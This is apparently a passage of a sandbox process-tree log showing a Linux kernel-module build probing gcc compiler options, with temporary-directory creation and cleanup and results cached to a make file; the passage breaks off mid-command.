/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -c -x c /dev/null -o /tmp/a/.tmp_1937/tmp4⤵PID:1939
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1937/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:1940
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1937/tmp5⤵PID:1941
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1937/tmp5⤵PID:1941
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1937/tmp5⤵PID:1941
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1937/tmp5⤵PID:1941
-
/bin/rmrm -rf /tmp/a/.tmp_19374⤵PID:1942
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wframe-larger-than_1024\";_else_echo_\"\";_fi := -Wframe-larger-than=1024' >> /tmp/a/.cache.mk"3⤵PID:1943
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wunused-but-set-variable -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-unused-but-set-variable\"; else echo \"\"; fi"3⤵PID:1944
-
/bin/mkdirmkdir -p /tmp/a/.tmp_19444⤵PID:1945
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wunused-but-set-variable -c -x c /dev/null -o /tmp/a/.tmp_1944/tmp4⤵PID:1946
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1944/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wunused-but-set-variable "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:1947
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1944/tmp5⤵PID:1948
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1944/tmp5⤵PID:1948
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1944/tmp5⤵PID:1948
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1944/tmp5⤵PID:1948
-
/bin/rmrm -rf /tmp/a/.tmp_19444⤵PID:1949
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wunused-but-set-variable_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-unused-but-set-variable\";_else_echo_\"\";_fi := -Wno-unused-but-set-variable' >> /tmp/a/.cache.mk"3⤵PID:1950
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wunused-const-variable -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-unused-const-variable\"; else echo \"\"; fi"3⤵PID:1951
-
/bin/mkdirmkdir -p /tmp/a/.tmp_19514⤵PID:1952
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wunused-const-variable -c -x c /dev/null -o /tmp/a/.tmp_1951/tmp4⤵PID:1953
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1951/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=2" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:1954
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1951/tmp5⤵PID:1955
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1951/tmp5⤵PID:1955
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1951/tmp5⤵PID:1955
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1951/tmp5⤵PID:1955
-
/bin/rmrm -rf /tmp/a/.tmp_19514⤵PID:1956
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wunused-const-variable_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-unused-const-variable\";_else_echo_\"\";_fi := -Wno-unused-const-variable' >> /tmp/a/.cache.mk"3⤵PID:1957
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -fno-var-tracking-assignments\"; else echo \"\"; fi"3⤵PID:1958
-
/bin/mkdirmkdir -p /tmp/a/.tmp_19584⤵PID:1959
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -c -x c /dev/null -o /tmp/a/.tmp_1958/tmp4⤵PID:1960
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1958/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:1961
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1958/tmp5⤵PID:1962
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1958/tmp5⤵PID:1962
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1958/tmp5⤵PID:1962
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1958/tmp5⤵
- Writes file to tmp directory
PID:1962 -
/bin/rmrm -rf /tmp/a/.tmp_19584⤵PID:1963
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls__-fno-var-tracking-assignments_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"_-fno-var-tracking-assignments\";_else_echo_\"\";_fi := -fno-var-tracking-assignments' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1964 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare 